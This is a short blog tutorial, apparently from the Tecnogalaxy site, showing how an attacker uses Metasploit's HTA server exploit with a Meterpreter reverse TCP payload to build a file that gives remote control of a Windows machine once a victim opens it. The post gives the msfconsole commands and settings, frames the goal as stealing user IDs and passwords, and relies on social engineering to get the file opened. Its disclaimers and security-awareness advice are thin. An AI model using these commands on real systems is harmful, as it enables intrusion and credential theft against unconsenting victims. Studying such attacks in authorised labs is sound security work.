Dear Tecnogalaxy readers, are you still wondering about an article with a strange title? Yes, today we are going to see a technique that if used by an attacker could put at risk our computer security, all this just by opening a simple file! Crazy if you think about it.

Let’s get into the mind of a hacker who has to steal userID, passwords to access various systems, files, and then sell this information on the dark web…. as first thing will study the field of attack and the strategy both computer science and social engineering to put in place.

Obviously this test is only for educational purposes, I do not assume any responsibility for what you will do, hacking someone else’s system without permission is punishable by law.

How the infected file attack works

We start immediately with our test always using our dear friend Kali Linux, we open a shell and write the following command:

ifconfig (to retrieve the ip address)
msfconsole (run msfconsole)

Now we need to retrieve the form to use, let’s write the command:

use exploit/windows/misc/hta_server
set lhost "our ip address"
set srvhost "our ip address".
set payload windows/meterpreter/reverse_tcp
set lport 8111

Let’s launch the exploit:


At this point the tool generates the file that the attacker will send to the victim by downloading it from the following link:

Now the social engineering technique comes into play, the success of the attack will depend on the ability of the attacker to induce the victim to open the newly generated file.

Do not open this file (example of hacker attack)

Once the file is opened, the listening system hooks the computer of the unlucky person and takes possession of the entire system.

As we have seen, opening a file without being 100% aware of its origin could put your system and the entire company network at risk.

You have to be wary of the web and always check in detail the origin of any file, email, link etc.

As always, make good use of it by making tests on your device / computer, make them on devices / computers that are not yours is illegal.

To the next article!

N.B.: I don’t assume any responsibility of the use that you will make of the guide, as it is written for didactic and formative use.

Read also:

Was this article helpful to you? Help this site to keep the various expenses with a donation to your liking by clicking on this link. Thank you!

Follow us also on Telegram by clicking on this link to stay updated on the latest articles and news about the site.

If you want to ask questions or talk about technology you can join our Telegram group by clicking on this link.

© - It is forbidden to reproduce the content of this article.